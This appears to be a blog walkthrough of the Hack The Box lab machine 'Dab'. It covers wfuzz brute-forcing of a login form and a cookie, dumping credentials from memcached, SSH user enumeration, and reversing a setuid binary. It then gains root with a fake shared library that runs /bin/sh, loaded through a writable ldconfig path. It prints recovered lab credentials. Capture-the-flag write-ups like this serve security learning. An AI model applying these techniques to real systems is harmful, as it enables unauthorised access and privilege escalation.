<!DOCTYPE html>
<html>
<style>

		@font-face { font-family: "gohu"; src: url("/gohu.woff") format('woff'); }
		body {
			font-family: 'gohu', monospace;
			max-width: 50em;
			margin: 0 auto;
			color: white;
			background: black;
			line-height: calc(1ex / 0.32);
			margin-top: 3em;
		}
		pre {
			font-family: 'gohu', monospace;
			white-space: pre-wrap;
			line-height: 125%;
      background-color: #111;
      padding: 1em;
		}
		@media only screen and (max-width:768px) {
			body {
				max-width:100%;
			}
		}
		a:link {
			color: #0a0 ;
		}
		a:visited {
			color: #004100 ;
		}
		td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
		td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
		.codehilite .hll { background-color: #0000ff }
		.codehilite { background: #000000; }
		.codehilite .c { color: #00ff00 } /* Comment */
		.codehilite .k { color: #ff0000 } /* Keyword */
		.codehilite .ch { color: #00ff00 } /* Comment.Hashbang */
		.codehilite .cm { color: #00ff00 } /* Comment.Multiline */
		.codehilite .cp { color: #e5e5e5 } /* Comment.Preproc */
		.codehilite .cpf { color: #00ff00 } /* Comment.PreprocFile */
		.codehilite .c1 { color: #00ff00 } /* Comment.Single */
		.codehilite .cs { color: #00ff00 } /* Comment.Special */
		.codehilite .kc { color: #ff0000 } /* Keyword.Constant */
		.codehilite .kd { color: #ff0000 } /* Keyword.Declaration */
		.codehilite .kn { color: #ff0000 } /* Keyword.Namespace */
		.codehilite .kp { color: #ff0000 } /* Keyword.Pseudo */
		.codehilite .kr { color: #ff0000 } /* Keyword.Reserved */
		.codehilite .kt { color: #ee82ee } /* Keyword.Type */
		.codehilite .s { color: #87ceeb } /* Literal.String */
		.codehilite .no { color: #7fffd4 } /* Name.Constant */
		.codehilite .nf { color: #ffff00 } /* Name.Function */
		.codehilite .nv { color: #eedd82 } /* Name.Variable */
		.codehilite .sa { color: #87ceeb } /* Literal.String.Affix */
		.codehilite .sb { color: #87ceeb } /* Literal.String.Backtick */
		.codehilite .sc { color: #87ceeb } /* Literal.String.Char */
		.codehilite .dl { color: #87ceeb } /* Literal.String.Delimiter */
		.codehilite .sd { color: #87ceeb } /* Literal.String.Doc */
		.codehilite .s2 { color: #87ceeb } /* Literal.String.Double */
		.codehilite .se { color: #87ceeb } /* Literal.String.Escape */
		.codehilite .sh { color: #87ceeb } /* Literal.String.Heredoc */
		.codehilite .si { color: #87ceeb } /* Literal.String.Interpol */
		.codehilite .sx { color: #87ceeb } /* Literal.String.Other */
		.codehilite .sr { color: #87ceeb } /* Literal.String.Regex */
		.codehilite .s1 { color: #87ceeb } /* Literal.String.Single */
		.codehilite .ss { color: #87ceeb } /* Literal.String.Symbol */
		.codehilite .fm { color: #ffff00 } /* Name.Function.Magic */
		.codehilite .vc { color: #eedd82 } /* Name.Variable.Class */
		.codehilite .vg { color: #eedd82 } /* Name.Variable.Global */
		.codehilite .vi { color: #eedd82 } /* Name.Variable.Instance */
		.codehilite .vm { color: #eedd82 } /* Name.Variable.Magic */
	
</style>
<head>
  <meta charset="UTF-8">
</head>

<body><h1>Hackthebox dab</h1>
<h2>Walkthrough</h2>
<p>Starting with nmap to search some useful ports, we get that output:</p>
<p><img alt="01" src="/assets/images/htb/dab/01.png" /></p>
<p>We find ftp on port 21 , ssh on port 22 , http on port 80 and 8080 and both of them are nginx.</p>
<p>lets take a loot at ports 80 and 8080.</p>
<p><img alt="02" src="/assets/images/htb/dab/02.png" /></p>
<p><img alt="03" src="/assets/images/htb/dab/03.png" /></p>
<hr />
<h2>HTTP 80</h2>
<p>If we try to login with common login and passwords, like <strong>admin:???</strong>, <strong>root:root</strong>, <strong>login:password</strong> we'll only get errors returns.
Intercepting with burp, we can see the login process POST request, with 3 parameters: <code>username=&amp;password=&amp;submit=</code>.</p>
<p><img alt="04" src="/assets/images/htb/dab/04.png" /></p>
<hr />
<h3>Fuzzing with wfuzz</h3>
<p>Using the <strong>wfuzz</strong> to fuzz the login form, we can get the password.</p>
<p>the command line:</p>
<p><code>wfuzz -c -u http://10.10.10.86/login -w darkweb2017-top10000.txt -d "username=admin&amp;password=FUZZ" -hh 542</code></p>
<p>where the "FUZZ" pace will recv the bruteforce, we can find the password <strong>"password1"</strong> ( -.-' )</p>
<p><img alt="05" src="/assets/images/htb/dab/05.png" /></p>
<p>and, after login, we can see that page:</p>
<p><img alt="06" src="/assets/images/htb/dab/06.png" /></p>
<p>nice output, but it's useless 4 us at now.</p>
<hr />
<h2>HTTP 8080</h2>
<p>Looking at the 8080 port again, we can see the mensage "Access denied: password authentication cookie not set". Let's fuzz again.
Using wfuzz again, but now to get the cookie we can get it.</p>
<p><strong>command line:</strong> <code>wfuzz -c -u http://10.10.10.86/login -w darkweb2017-top10000.txt -H "Cookie: password=FUZZ" -hh 324</code></p>
<p>the output:</p>
<p><img alt="07" src="/assets/images/htb/dab/08.png" /></p>
<p>modifying the cookie param with burp, we get a page:</p>
<p><img alt="09" src="/assets/images/htb/dab/09.png" /></p>
<p><img alt="10" src="/assets/images/htb/dab/10.png" /></p>
<h2>Memcached</h2>
<p>Memcached is a simple, highly scalable key-based cache that stores data and objects wherever dedicated or spare RAM is available for quick access by applications, without going through layers of parsing or disk I/O. To use, you run the memcached command on one or more hosts and then use the shared cache to store objects. By default, memcached uses the following settings: - Memory allocation of 64MB - Listens for connections on all network interfaces, using port <strong>11211</strong> - Supports a maximum of 1024 simultaneous connections.</p>
<p>looking at the <a href="https://lzone.de/cheat-sheet/memcached">Memcached cheat sheet</a> we can find somes commands to test. so, query the memory statistics with stats slabs.</p>
<p><img alt="11" src="/assets/images/htb/dab/11.png" /></p>
<p>By looking at the slab with id 26 we ca see that the chunk size of it is 27120.
dumping keys for this slab:</p>
<p><strong>stats cachedump 26 0</strong></p>
<ul>
<li>26 it's the id</li>
<li>0 for no limit output</li>
</ul>
<p><img alt="users-query" src="/assets/images/htb/dab/12.png" /></p>
<p>now, we can use the <strong>get</strong> to return the user content:</p>
<p><strong>get users</strong></p>
<p><img alt="users-get-out" src="/assets/images/htb/dab/13.png" /></p>
<p>and we got a json with a lot of users and pass.</p>
<p><img alt="users-dump" src="/assets/images/htb/dab/14.png" /></p>
<hr />
<h2>Enumerating step</h2>
<p>Using the module <strong>json.tool</strong> from python, we can get a more clear output.</p>
<div class="codehilite"><pre><span></span><code><span class="n">cat</span><span class="w"> </span><span class="n">users</span><span class="o">.</span><span class="n">txt</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">python</span><span class="w"> </span><span class="o">-</span><span class="n">m</span><span class="w"> </span><span class="n">json</span><span class="o">.</span><span class="k">tool</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="n">output</span><span class="o">.</span><span class="n">txt</span><span class="w"> </span>
</code></pre></div>


<p><img alt="clear-out" src="/assets/images/htb/dab/15.png" /></p>
<p>now, let's separate users an passwords in different files.</p>
<div class="codehilite"><pre><span></span><code>cat output.txt | cut -d &quot;:&quot; -f 1 | cut -d &#39;&quot;&#39; -f 2 &gt; usernames.txt 
</code></pre></div>


<p>and:</p>
<div class="codehilite"><pre><span></span><code>cat output.txt | cut -d &quot;:&quot; -f 2 | cut -d &#39;&quot;&#39; -f 2 &gt; passwords.txt
</code></pre></div>


<p>Using msfconsole, we can enum the users with our "usernames.txt" file.</p>
<p><img alt="msfprint" src="/assets/images/htb/dab/16.png" /></p>
<p>It will run for a while, but, we'll found the user <strong>genevieve</strong>.</p>
<p><img alt="user-found-msf" src="/assets/images/htb/dab/17.png" /></p>
<p>now we need to get the password of that user. You can use john , hashcat or any online crackers(my case).</p>
<p><img alt="password-crack" src="/assets/images/htb/dab/18.png" /></p>
<p>got it!</p>
<p>now, we have the credentials <code>genevieve:Princess1</code>, so, lets test on ssh.</p>
<p><img alt="gotit-user" src="/assets/images/htb/dab/19.png" /></p>
<hr />
<h2>Privilege escalation</h2>
<p>Running <code>sudo -l</code> to try get any command, we get the message <strong>"User genevieve may run the following commands on dab: (root) /usr/bin/try_harder"</strong>, but if we try to run it, it gets us a root shell then immediately dies after the first command and returns segfault error.</p>
<p><img alt="sudol-trol" src="/assets/images/htb/dab/20.png" /></p>
<p>Using the command <strong>find / -perm -4000</strong> to search for binaries with suid permissions, we can see a binary kinda weird called <strong>myexec</strong>.</p>
<p><img alt="myexec1" src="/assets/images/htb/dab/21.png" /></p>
<p>that binary asks for a password. if we tries to put "root" or something similar, we'll get refused.</p>
<p><img alt="myexec-refuse" src="/assets/images/htb/dab/22.png" /></p>
<h2>Reversing the binary</h2>
<p>First than first, let's download the binary on our box with scp.</p>
<div class="codehilite"><pre><span></span><code><span class="n">scp</span><span class="w"> </span><span class="n">genevieve</span><span class="mf">@10.10.10.86</span><span class="o">:/</span><span class="n">usr</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">myexec</span><span class="w"> </span><span class="o">/</span><span class="p">...</span><span class="o">/</span><span class="n">your_path</span><span class="o">/</span><span class="p">...</span><span class="o">/</span>
</code></pre></div>


<p><img alt="myexec-download" src="/assets/images/htb/dab/23.png" /></p>
<p>Now, lets debug it. In my case, i used <a href="https://rada.re">Radare2</a>, but you can use any other method if you want, like ltrace.</p>
<p>Using <strong>"aaa"</strong><em> to analize the binary, and </em><em>pdf @ function</em>* to disassemble a function, we get that output:</p>
<p><img alt="r2-1" src="/assets/images/htb/dab/24.png" /></p>
<p><img alt="r2-2" src="/assets/images/htb/dab/25.png" /></p>
<p>And, as we can see at**0x0040084d</p>
<p>48b873336375.</p>
<p>movabs rax, 0x306c337275633373<strong> and </strong>0x0040085b</p>
<p>c745a867316e.</p>
<p>mov dword [local_58h], 0x6e3167<strong>, The password is </strong>s3cur3l0g1n**. now, lets back to the box and try to put it on password input.</p>
<p><img alt="pass-error" src="/assets/images/htb/dab/26.png" /></p>
<h2>Dynamically linked shared object library</h2>
<p>Using <strong>strace</strong> to check the syscalls, we can see that the bin loads a shared library called <strong>libseclogin.so</strong></p>
<p><img alt="libsec" src="/assets/images/htb/dab/27.png" /></p>
<p>That's kinda weird, cuz this isn't a common sharedlib function, and that name corresponds to the <strong>seclogin()</strong> function that our binary calls, as we saw above. So, basically, we must build our own sharedlib <strong>libseclogin.so</strong>, cuz if we can replace it with another our lib and link to it, the binary will run it as root.</p>
<p>Before start with our libsec build, lets see some important things: How we can make <strong>myexec</strong> calls our lib instead the default one? maybe well, we could try to use the ld_preload. so, lets take a look aboutit. With <strong>LD_PRELOAD</strong> you can give libraries precedence. Ex: If you set <strong>LD_PRELOAD</strong> to the path of a shared object, that file will be loaded before any other library (including the C runtime, libc.so). but, that's doensn't works as well on suid binaries for security reasons. But, we have root execution on <strong><a href="http://man7.org/linux/man-pages/man8/ldconfig.8.html">ldconfig</a></strong>, and as we can see, it using the config file /etc/ld.so.conf to load and cache shared libraries.</p>
<p><img alt="ldsoconf" src="/assets/images/htb/dab/28.png" /></p>
<p>Basically, the config says to include any <code>*.conf</code> file, and we have world-writable acess. so, we can add our own config file, that's points to our controlled folder with our builded fake sharedlib. Lets do it.</p>
<p>Firstly, we make a folder where we have permission to write, then we puts our fake sharelib into it, compile it and then points to it writing a .conf file at ld.so.conf. After that, we need to use ldconfig (which, as we have seen, we have root permission) to change the path.</p>
<p>The fake lib.c:</p>
<div class="codehilite"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span>


<span class="kt">void</span><span class="w"> </span><span class="nf">seclogin</span><span class="p">()</span>
<span class="p">{</span>




<span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>




<span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>




<span class="n">system</span><span class="p">(</span><span class="s">&quot;/bin/sh&quot;</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>


<p>Compile with:</p>
<p><code>gcc -fPIC -shared -o libseclogin.so exploit.c</code></p>
<p><img alt="98" src="/assets/images/htb/dab/98.png" /></p>
<p><img alt="99" src="/assets/images/htb/dab/99.png" /></p>
<p><img alt="100" src="/assets/images/htb/dab/100.png" /></p>
<h2>Concluding remarks</h2>
<p>that's was a nice box by hackthebox, i've learn a lot. I hope somehow this post will be useful to you in life, or in some other world. Otherwise, Lets pwn the world!</p>
<hr />
<h3>References</h3>
<ul>
<li>
<p><a href="https://www.cyberciti.biz/faq/linux-setting-changing-library-path/">Set OR Change The Library Path</a></p>
</li>
<li>
<p><a href="https://linux.die.net/man/8/ldconfig">ldconfig manual</a></p>
</li>
<li>
<p><a href="https://downloads.mysql.com/docs/mysql-memcached-en.a4.pdf">Mysql memcached</a></p>
</li>
<li>
<p><a href="https://lzone.de/cheat-sheet/memcached">Memcached cheatsheet by lzone</a></p>
</li>
</ul></body><hr>by cnx</html>